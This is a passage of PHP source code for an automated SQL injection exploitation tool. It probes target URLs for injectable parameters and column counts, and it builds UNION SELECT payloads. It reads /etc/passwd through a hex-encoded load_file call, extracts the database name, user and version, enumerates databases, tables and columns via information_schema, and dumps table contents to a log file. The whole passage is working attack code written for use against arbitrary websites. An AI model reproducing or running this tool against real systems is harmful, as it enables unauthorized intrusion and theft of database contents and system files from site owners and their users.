$panjang_kedua) { echo "\n[+][+]W00t !!! Found possible blind sqli at : ". $urlx."\n"; $a=NULL; $a="\n[+][+]W00t !!! Found possible blind sqli at : ". $urlx."\n"; tulisfile($a); } else { echo "\n[-] Sorry no possible blind sqli found here ! \n"; } } echo "\n"; } function opsi_1() { global $a,$otomatis,$ch,$hasilcek2,$generalerror,$wzap,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "Type an url for sql injection vulnerability checking:\n"; //"Type an url for sql injection vulnerability checking:\n"; $url = trim(fgets(STDIN)); cek_kutip($url); cek_order_by_100($url); cek_blind($url); die(); } function opsi_2() { global $r1,$r2,$r3,$filemode,$a,$otomatis,$ch,$hasilcek2,$generalerror,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "Type text file with target url(s) for sql injection vulnerability checking:\n"; $file = trim(fgets(STDIN)); echo "***************working please wait*************** \n"; // "Type text file with target url(s) for sql injection vulnerability checking:\n"; //$file; // "***************working please wait*************** \n"; $filemode="ya"; $wzap=1; bacalist($file); while (!feof($handle)) // Loop till end of life thread of this object. { $url=fgets($handle, 4096); // Read a line. $url=trim($url); if(!empty($url)) { cek_order_by_100($url); cek_blind($url); } $wzap++; } die(); } function opsi_3() { global $a,$otomatis,$ch,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "Type text file with target url(s) for column finder:\n"; //"Type text file with target url(s) for column finder:\n"; $file = trim(fgets(STDIN)); echo "\n(if you don't type max column length to search, max column search will be 100)"; echo "\nType max column length number to search for every target:\n"; $jum = trim(fgets(STDIN)); if(empty($jum)) { $jum=100; } echo "***************working please wait*************** \n"; //"***************working please wait*************** \n"; $wzap=1; bacalist($file); while (!feof($handle)) // Loop till end of life thread of this object. { $url=fgets($handle, 4096); // Read a line. $url=trim($url); echo "\nurl: $url\n"; colfinder($url,$jum); $wzap++; } } function blind_colfinder($url,$jum) { global $ketemu,$a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $found=FALSE; $jum2=1; $jum++; $string_no=NULL; $url_blind=NULL; $mywisdom="concat(0x6d79776973646f6d)"; $mywisdom2="concat(0x6d79776973646f6d),"; $url_blind2=NULL; $url_blind3=NULL; $url_blind_code=NULL; $wisdom="mywisdom"; $hasilcek=FALSE; if(empty($jum)) { $jum=100; } $found=FALSE; if(!empty($url)) { while(!($found) and ($jum2<$jum)) { $page=NULL; $hasilcek=FALSE; if($jum2==1) { $url_blind=$url."+and+1=7+union+all+select+$mywisdom--"; $url_blind_code=$url."+and+1=7+union+all+select+c0de--"; $urlc0de=$url_blind_code; } else { $jum3=$jum2-1; $rep=str_repeat($mywisdom2,$jum3); $url_blind=$url."+and+1=7+union+all+select+".$rep.$mywisdom."--"; } echo "\n[-]Checking column length for blind sqli : $jum2\n"; $urlx=$url_blind; basic_curl($urlx); $hasilcek=InStr($page,$wisdom); if($hasilcek) { echo $urlx."\n"; echo "[+] W00t !!!! Found column length: $jum2\n"; echo "[+] W00t !!!! Found blind sqli url at: $url_blind \n"; $a=NULL; $a= "[+] W00t !!!! Found column length: $jum2\n"; $a.= "[+] W00t !!!! Found blind sqli url at: $url_blind \n"; tulisfile($a); $ketemu=TRUE; $found=TRUE; } $jum2++; } //buat format url angka if($jum2>1) { $url_blind2=$url."+and+777=888+union+all+select+"; $x=1; while($x<$jum2) { $url_blind2=$url_blind2.$x.","; $x++; } $x--; $cari=$x.","; $penganti=$x."--"; $url_blind3=str_replace($cari, $penganti, $url_blind2); basic_curl($url_blind3); $hasilcek=InStr($page,$wisdom); if($hasilcek) { echo "\n[+]W00t!!! found sqli url: ".$url_blind3."\n"; $a=NULL; $a="\n[+]W00t!!! found sqli url: ".$url_blind3."\n"; $ketemu=TRUE; tulisfile($a); } $x2=$x; $x=2; $kode=FALSE; while(($x<$x2) and !($kode)) { $cari=",".$x; $penganti=",".$mywisdom; $url_blind3=str_replace($cari, $penganti, $url_blind3); $urlx=$url_blind3; basic_curl($urlx); $hasilcek=InStr($page,$wisdom); if($hasilcek) { $urlc0de=str_replace($mywisdom,"c0de", $urlx); $kode=TRUE; $ketemu=TRUE; } $url_blind3=str_replace($penganti, $cari, $url_blind3); $x++; } } //eof buat format url angka if($kode) { $ketemu=TRUE; echo "[+] W00t !!!! Found code url: $urlc0de\n"; $a="[+] W00t !!!! Found code url: $urlc0de\n"; tulisfile($a); } } //eof !empty url } function colfinder($url,$jum) { global $a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $panjang=NULL; $cek=NULL; $found=FALSE; $jum2=NULL; $hasilcek=NULL; $hasilcek2=NULL; $sqliurl=NULL; $stringunion=NULL; if(empty($jum)) { $jum=100; } if(!empty($url)) { $jum2=1; $jum++; $cek="order+by+".$jum2."--"; $protokol="http://"; $error="Unknown column"; $generalerror="supplied argument is not a valid MySQL result resource"; $tes=strstr($url,$protokol); if(!$tes) { $url=$protokol.$url; } $urlx=$url."+".$cek; echo "\nChecking column using basic sqli: "; // "\nChecking column: "; while(!$found and ($jum2<$jum)) { basic_curl($urlx); $hasilcek=strstr($page,$error); $hasilcek2=strstr($page,$generalerror); if($hasilcek) { $found=TRUE; $panjang=$jum2-1; } else { echo "$jum2".","; $jum2=$jum2+1; $cek="order+by+".$jum2."--"; $urlx=$url."+".$cek; $found=FALSE; } if($hasilcek2) { $found=TRUE; $panjang=$jum2-2; } } $trik=1; while($trik<$panjang+1) { if($trik==$panjang) { $stringunion.=$trik."--"; } else { $stringunion.=$trik.","; } $trik++; } $sqliurl=$url."+and+1=7+union+select+"; $sqliurl.=$stringunion; if(!empty($stringunion)) { echo "\n[+]W00t!! found column length:$panjang\n"; echo "[+]SQLi url:$sqliurl\n"; echo "-----------------------------------------\n"; $a="\n[+]W00t!! found column length:$panjang\n"; $a.="[+]SQLi url:$sqliurl\n"; $a.="-----------------------------------------\n"; tulisfile($a); if(empty($file)) { cekposisicode($sqliurl,$panjang); echo "[+]c0de url:$urlc0de"; $a="[+]c0de url:$urlc0de"; tulisfile($a); } } else { echo "\nSorry column lenth couldn't be found using basic sqli check ,now testing blind sqli checking...please wait!!! \n"; //"\nSorry column lenth couldn't be found ! \n"; } } else { echo "\nSorry target url is empty!!!!\n "; // "\nSorry target url is empty!!!!\n "; } } function opsi_4() { global $a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "\nType your target url:\n"; $url = trim(fgets(STDIN)); echo "\n(if you don't type max column length to search, max column search will be 100)"; echo "\nType max column length number to search:\n"; $jum = trim(fgets(STDIN)); // "\nType your target url:\n"; //$url; // "\n(if you don't type max column length to search, max column search will be 100)"; // "\nType max column length number to search:\n"; //$jum; colfinder($url,$jum); if(empty($urlc0de)) { blind_colfinder($url,$jum); } } function cekposisicode($sqliurl,$panjang) { global $a,$otomatis,$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $cekmysqluser="concat(0x43757272656e745f757365723a27,current_user(),0x27),"; $cekmysqluser2="concat(0x43757272656e745f757365723a27,current_user(),0x27)--"; $c0de="c0de,"; $found2=FALSE; $datauser="Current_user:'"; $cekmysqldb="concat(0x44617461626173653a27,database(),0x27),"; $trik=1; while(!$found2) { $trik2=$trik.","; if($trik<$panjang) { $urlx = str_replace($trik2,$cekmysqluser,$sqliurl); $akhir="belum"; } else { $urlx = str_replace($trik2,$cekmysqluser2,$sqliurl); $akhir="iya"; } basic_curl($urlx); $found2=strstr($page,$datauser); if($found2) { if($akhir=="iya") { $urlc0de = str_replace($cekmysqluser2,$c0de,$urlx); } else { $urlc0de = str_replace($cekmysqluser,$c0de,$urlx); } } $trik++; } } function opsi_5() { global $a,$otomatis,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; if(empty($urlc0de)) { echo "\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //"\nType target url c0de from previous scan:\n".$urlc0de; } infomysql(); } function InStr($String,$Find,$CaseSensitive = false) { $i=0; while (strlen($String)>=$i) { unset($substring); if ($CaseSensitive) { $Find=strtolower($Find); $String=strtolower($String); } $substring=substr($String,$i,strlen($Find)); if ($substring==$Find) return true; $i++; } return false; } function cek_load_file() { global $a,$page2,$urlx2,$urlx,$myroot,$a,$otomatis,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $load_file="load_file(0x2f6574632f706173737764)"; $urluser=str_replace($c0de,$load_file,$urlc0de); $myroot="root:x:"; $urlx2=$urluser; basic_curl2($urlx2); $hasilcek=InStr($page2,$myroot); if($hasilcek) { echo "-------------------------------------------------\n"; echo "\n[+]W00t! Found load file !!!\n"; echo "--------------------------------------------------\n"; echo "Check this out : $urluser\n"; echo "--------------------------------------------------\n"; $a= "-------------------------------------------------\n"; $a.="\n[+]W00t! Found load file !!!\n"; $a.="--------------------------------------------------\n"; $a.= "Check this out : $urluser\n"; $a.= "--------------------------------------------------\n"; tulisfile($a); } } function infomysql() { global $a,$otomatis,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $url=$urlc0de; cekhttp(); $urlc0de=$url; $c0de="c0de"; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; // "\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { cek_load_file(); echo "\n[+]Getting MySQL Configurations...\n"; echo "--------------------------------------------------\n"; $a="\n[+]Getting MySQL Configurations...\n"; $a.="--------------------------------------------------\n"; tulisfile($a); $jepetandb="0x6a65706574616e6462"; $jepetandb1="concat(".$jepetandb.",database(),"; $jepetandb2=$jepetandb.")"; $jepetandbx=$jepetandb1.$jepetandb2; $jepetanuser="0x6a65706574616e75736572"; $jepetanuser1="concat(".$jepetanuser.",current_user(),"; $jepetanuser2=$jepetanuser.")"; $jepetanuserx=$jepetanuser1.$jepetanuser2; $jepetanversi="0x6a65706574616e7665727369"; $jepetanversi1="concat(".$jepetanversi.",version(),"; $jepetanversi2=$jepetanversi.")"; $jepetanversix=$jepetanversi1.$jepetanversi2; $urldb=str_replace($c0de,$jepetandbx,$urlc0de); $urlx=$urldb; basic_curl($urlx); $araydb=explode("jepetandb", $page); if(!$araydb) { echo "[-]Error!!! Sorry Database name not found !\n"; //"[-]Error!!! Sorry Database name not found !\n"; } else { $namadb=$araydb[1]; if(!empty($namadb)) { echo "[+]Database : $namadb\n"; $a="[+]Database : $namadb\n"; tulisfile($a); } else { echo "[-]Sorry Database name not found !\n"; } } $urluser=str_replace($c0de,$jepetanuserx,$urlc0de); $urlx=$urluser; basic_curl($urlx); $arayuser=explode("jepetanuser",$page); if(!$arayuser) { echo "[-]Error !!! Sorry Current User Name not found !\n"; } else { $namauser=$arayuser[1]; if(!empty($namauser)) { echo "[+]Current User : $namauser\n"; $a="[+]Current User : $namauser\n"; tulisfile($a); } else { echo "[-]Sorry Current User Name not found !\n"; } } $urlversi=str_replace($c0de,$jepetanversix,$urlc0de); $urlx=$urlversi; basic_curl($urlx); $arayversi=explode("jepetanversi",$page); if(!$arayversi) { echo "[-]Error !!! Sorry Database Version not found !\n"; } else { $namaversi=$arayversi[1]; if(!empty($namaversi)) { echo "[+]MySQL version : $namaversi\n"; $a= "[+]MySQL version : $namaversi\n"; tulisfile($a); } else { echo "[-]Sorry MySQL version not found !\n"; } } } } function cek_mysql($urlc0de) { global $scanport,$fp,$errno,$errstr,$message,$res; global $a,$otomatis,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; if($scanport=="yes") { $message="\nhelp\n"; $arayhost = explode("/", $urlc0de); $host=$arayhost[2]; $port = 3306; $fp = @fsockopen ($host, $port, $errno, $errstr); if (!$fp) { $mysql_port_open="no"; $jepetanversi="0x6a65706574616e7665727369"; $jepetanversi1="concat(".$jepetanversi.",version(),"; $jepetanversi2=$jepetanversi.")"; $jepetanversix=$jepetanversi1.$jepetanversi2; $urlversi=str_replace($c0de,$jepetanversix,$urlc0de); $urlx=$urlversi; basic_curl($urlx); $arayversi=explode("jepetanversi",$page); if(!$arayversi) { echo "[-]Error !!! Sorry Database Version not found !\n"; } $mysql_port_open="yes"; $namaversi=$arayversi[1]; if(strstr($namaversi,"4.")) { $namaversi="4"; } else { $namaversi="5"; } } else { fputs ($fp, $message); $res.= fgets ($fp, 1024); if(strstr($res,"4.")) { $namaversi="4"; } else { $namaversi="5"; } } } //eof if scan port yes else { $jepetanversi="0x6a65706574616e7665727369"; $jepetanversi1="concat(".$jepetanversi.",version(),"; $jepetanversi2=$jepetanversi.")"; $jepetanversix=$jepetanversi1.$jepetanversi2; $urlversi=str_replace($c0de,$jepetanversix,$urlc0de); $urlx=$urlversi; basic_curl($urlx); $arayversi=explode("jepetanversi",$page); if(!$arayversi) { echo "[-]Error !!! Sorry Database Version not found !\n"; } $mysql_port_open="yes"; $namaversi=$arayversi[1]; if(strstr($namaversi,"4.")) { $namaversi="4"; } else { $namaversi="5"; } } } function opsi_6() { global $currentdb,$fp,$errno,$errstr,$message,$res; global $a,$otomatis,$ukuranaray2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; if(empty($urlc0de)) { echo "\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //"\nType target url c0de from previous scan:\n".$urlc0de; } $url=$urlc0de; cekhttp(); $urlc0de=$url; infomysql(); $currentdb=$namadb; echo "\n****searching database(s) name from information_schema.schemata****\n"; $a="\n****searching database(s) name from information_schema.schemata****\n"; tulisfile($a); $evasion="--"; $c0de="c0de"; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; // "\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { cek_mysql($urlc0de); if($namaversi=="4") { echo "\nSorry this step is for mysql 5+ !!! your target mysql is below 5\n"; } else { $endschema="+from+information_schema.schemata--"; $stringschema="group_concat(0x60,schema_name)"; $urlschema=str_replace($c0de,$stringschema,$urlc0de); $urlschema=str_replace($evasion,$endschema,$urlschema); $urlx=$urlschema; echo "\n[+]Checking url:$urlx\n"; basic_curl($urlx); $araydb=explode("`",$page); if(!$araydb) { echo "[-]Error!!! Sorry Databases Data this user has access not found!!!\n"; } else { $jum=0; $i=0; $ukuranaray=sizeof($araydb); $namadb=NULL; $no=1; $ukuranaray2=$ukuranaray+2; while($i<$ukuranaray2) { $i++; $kontenaray=$araydb[$i]; $panjangstring=strlen($araydb[$i]); if($panjangstring<50) { if(!empty($kontenaray) and !strstr($namadb,$kontenaray)) { $namadb.="\n[$no] ".$kontenaray; if(!strstr($namadb,$currentdb)) { $no++; $jum++; $namadb.="\n[$no] ".$currentdb; } $jum++; $no++; } } } $namadb=str_replace(",","",$namadb); if(!empty($namadb)) { echo "[+]W00t! Availabe database(s) information access here:\n"; echo "[+]Some Database(s) this user can access: $jum (sorry max database view around 100 database(s))\n"; echo "[+]Databases : $namadb\n"; $a="[+]W00t! Availabe database(s) information access here:\n"; $a.= "[+]Some Database(s) this user can access: $jum (sorry max database view around 100 database(s))\n"; $a.="[+]Databases : $namadb\n"; tulisfile($a); } } } } } function opsi_7() { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $a,$otomatis,$ix,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; if(empty($urlc0de)) { echo "\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //"\nType target url c0de from previous scan:\n".$urlc0de; } $url=$urlc0de; cekhttp(); $urlc0de=$url; $oldurlc0de=$urlc0de; $url_bejat=$urlc0de; infomysql(); $evasion="--"; $c0de="c0de"; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; //"\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { cek_mysql($urlc0de); if($namaversi=="4") { echo "\nSorry this step is for mysql 5+ !!! your target mysql is below 5\n"; //"\nSorry this step is for mysql 5+ !!! your target mysql is below 5\n"; } else { $evasion="--"; $stringschema="group_concat(0x60,table_name,0x60)"; $endschema="+from+information_schema.tables+where+table_schema=database()--"; //operasi info schema $urlschema=str_replace($c0de,$stringschema,$urlc0de); $urlschema=str_replace($evasion,$endschema,$urlschema); $urlx=$urlschema; echo "\n[+]Checking url:$urlx\n"; echo "\n****searching table(s) and column(s) from current database****\n"; $a="\n[+]Checking url:$urlx\n"; $a.="\n****searching table(s) and column(s) from current database****\n"; tulisfile($a); basic_curl($urlx); $araydb=explode("`",$page); if(!$araydb) { echo "[-]Error!!! Sorry Data can not be found!!!\n"; //"[-]Error!!! Sorry Data can not be found!!!\n"; } else { $namatabel=NULL; $i=1; $jum=0; $ukuranaray=sizeof($araydb); while($jum<$ukuranaray) { $concatable=$araydb[$jum]; if(strlen($concatable)<50) { $namatabel=$araydb[$jum]; $namatabel=str_replace(",","",$namatabel); $namatabel=trim($namatabel); if(strlen($namatabel)>1 and !strstr($tablehash,$namatabel)) { $tablehash.=$namatabel." "; $namatabel2=$namatabel; echo "[$i] $namatabel2 : "; $a="[$i] $namatabel2 : "; kolomschema($namatabel2,$oldurlc0de); $namatable2=NULL; echo "\n"; $a.="\n"; tulisfile($a); $i++; } } $jum++; } } $i--; echo "\nTotal table(s) found:$i\n"; $a="\nTotal table(s) found:$i\n"; tulisfile($a); //eof operasi info schema } } } function kolomschema($namatabel2,$oldurlc0de) { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $open_vms,$concatdump,$strdump,$strdump2,$aksidump,$otomatis,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $string=$namatabel2; $strdump="concat(0x6d79776973646f6d,group_concat(0x3a"; $strdump2="),0x6d79776973646f6d)"; $concatdump=NULL; strToHex($string); $hextable="0x".$hex; $evasion="--"; $c0de="c0de"; $concatkolom="group_concat(0x60,column_name,0x60)"; $strkoleva="+from+information_schema.columns+where+table_name=$hextable--"; $oldurlc0de=$url_bejat; $oldurlc0de=str_replace($evasion,$strkoleva,$oldurlc0de); $oldurlc0de=str_replace($c0de,$concatkolom,$oldurlc0de); $urlx2=$oldurlc0de; basic_curl2($urlx2); $araykolom=explode("`",$page2); $zzz=1; while($zzz1 and strlen($kolor)<50) { if(!strstr($stok_kolor,$kolor)) { $stok_kolor.=$kolor; $kolor=str_replace(",","",$kolor); if($aksidump=="yes") { $concatdump.=",".$kolor.",0x3a"; } else { echo $kolor.","; $a=$kolor.","; tulisfile($a); } } } $zzz++; } $open_vms=$strdump.$concatdump.$strdump2; $kolor=NULL; $stok_kolor=NULL; } function strToHex($string) { global $fp,$errno,$errstr,$message,$res; global $a,$otomatis,$ix,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; global $string,$i,$hex; $hex=''; for ($ix=0; $ix < strlen($string); $ix++) { $hex .= dechex(ord($string[$ix])); } return $hex; } function opsi_8() { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $stropdumkol1,$stropdumkol2,$stropdumkol3,$stropdumkol4,$colom,$denzuko,$capede,$by,$wisdom,$coding_by_mywisdom,$mywisdom,$open_vms,$concatdump,$strdump,$strdump2,$aksidump,$otomatis,$tabel,$ix,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //"\nType target url c0de from previous scan:\n".$urlc0de; echo "\nType table name to dump:\n"; $tabel = trim(fgets(STDIN)); //"\nType table name to dump:\n".$tabel; echo "(please type column name to dump, if you want to dump all columns just press enter)"; echo "\nType column name to dump:\n"; $colom = trim(fgets(STDIN)); $url=$urlc0de; $by="mywisdom"; cekhttp(); $urlc0de=$url; $oldurlc0de=$urlc0de; $url_bejat=$urlc0de; $evasion="--"; $c0de="c0de"; $namatabel2=$tabel; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; //"\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { infomysql(); echo "\nColumn(s) inside $namatabel2\n"; //"\nColumn(s) inside $namatabel2\n"; $aksidump="no"; kolomschema($namatabel2,$oldurlc0de); echo "\n****************************************************\n"; $a="\n****************************************************\n"; tulisfile($a); if(empty($colom)) { $aksidump="yes"; kolomschema($namatabel2,$oldurlc0de); $coding_by_mywisdom="+from+$tabel--"; $mywisdom=str_replace($evasion,$coding_by_mywisdom,$url_bejat); $wisdom=str_replace($c0de,$open_vms,$mywisdom); echo "[+]URL injection: $wisdom"; $a="[+]URL injection: $wisdom"; echo "\n****************************************************\n"; $a.="\n****************************************************\n"; echo "\n[+]Data dumps from table:\n"; $a.="\n[+]Data dumps from table:\n"; $urlx=$wisdom; asal(); basic_curl($urlx); $capede = explode("mywisdom", $page); $denzuko=$capede[1]; pembersih(); if(!empty($denzuko)) { echo $denzuko."\n"; $a.=$denzuko."\n"; } else { echo "\nSorry data empty !!! no data found or columns too long !!!\n"; //"\nSorry data empty !!! no data found !!!\n"; } } else { //basis kolom //eof basis kolom } } tulisfile($a); } function opsi_9() { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $araykol,$hit,$targa,$ediman_lukito,$todlah,$object_oriented,$bhk,$defuse,$ujitabel,$ujikolom,$trialtable,$trialkolom,$daftar_tabel,$daftar_kolom,$alexander,$michael_angelo,$otomatis,$fuzz_tables,$fuzz_columns,$tabel,$ix,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, 